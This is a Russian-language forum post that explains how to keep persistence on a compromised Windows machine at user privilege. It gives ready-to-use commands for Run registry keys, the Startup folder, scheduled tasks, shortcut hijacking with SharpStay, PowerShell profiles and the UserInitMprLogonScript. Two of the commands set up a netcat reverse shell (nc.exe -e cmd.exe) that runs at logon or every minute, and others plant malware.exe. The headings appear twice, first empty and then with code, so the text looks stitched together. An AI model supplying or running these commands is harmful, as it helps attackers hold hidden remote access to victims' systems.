devqp
Специалист
Персистенция обеспечивает сохранение доступа к системе после компрометации. Ниже представлены ключевые методы для уровня прав пользователя.
Реестр и папка автозагрузки
Добавление записи в автозагрузку реестра:
Альтернатива: размещение исполняемого файла в папке автозагрузки:
Планировщик заданий
Создание задачи, выполняющейся каждую минуту:
Инструмент ScheduleRunner для автоматизации:
Ярлыки (.lnk)
Изменение цели существующего ярлыка:
Использование SharpStay для создания/модификации:
Профиль PowerShell
Добавление команды в профиль текущего пользователя:
Файл исполняется при запуске PowerShell.
Скрипт входа UserInitMprLogonScript
Установка пути к скрипту в реестре:
Скрипт выполняется при входе пользователя в систему.
Компонентная объектная модель (COM) будет рассмотрена отдельно.
Реестр и папка автозагрузки
Добавление записи в автозагрузку реестра:
Код:
REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 1 /d "C:\Path\nc.exe -e cmd.exe IP PORT"
Код:
C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Планировщик заданий
Создание задачи, выполняющейся каждую минуту:
Код:
schtasks /create /sc minute /mo 1 /tn "TaskName" /tr 'C:\Path\nc.exe 192.168.56.103 1337 -e cmd.exe'
Код:
ScheduleRunner.exe /method:create /taskname:Cleanup /trigger:daily /starttime:23:30 /program:calc.exe
Ярлыки (.lnk)
Изменение цели существующего ярлыка:
Код:
powershell.exe -c "invoke-item C:\Path\malware.exe"
Код:
Sharpstay.exe action=BackdoorLNK command="C:\Windows\temp\fun.exe" lnkpath="C:\users\user\desktop\Target.lnk"
Sharpstay.exe action=NewLNK lnktarget="C:\Path\file.exe" lnkicon="C:\Windows\system32\notepad.exe"
Профиль PowerShell
Добавление команды в профиль текущего пользователя:
Код:
echo "whoami > C:\temp\output.txt" > $PROFILE
Скрипт входа UserInitMprLogonScript
Установка пути к скрипту в реестре:
Код:
HKCU\Environment\UserInitMprLogonScript → Значение: C:\Path\malware.exe
Компонентная объектная модель (COM) будет рассмотрена отдельно.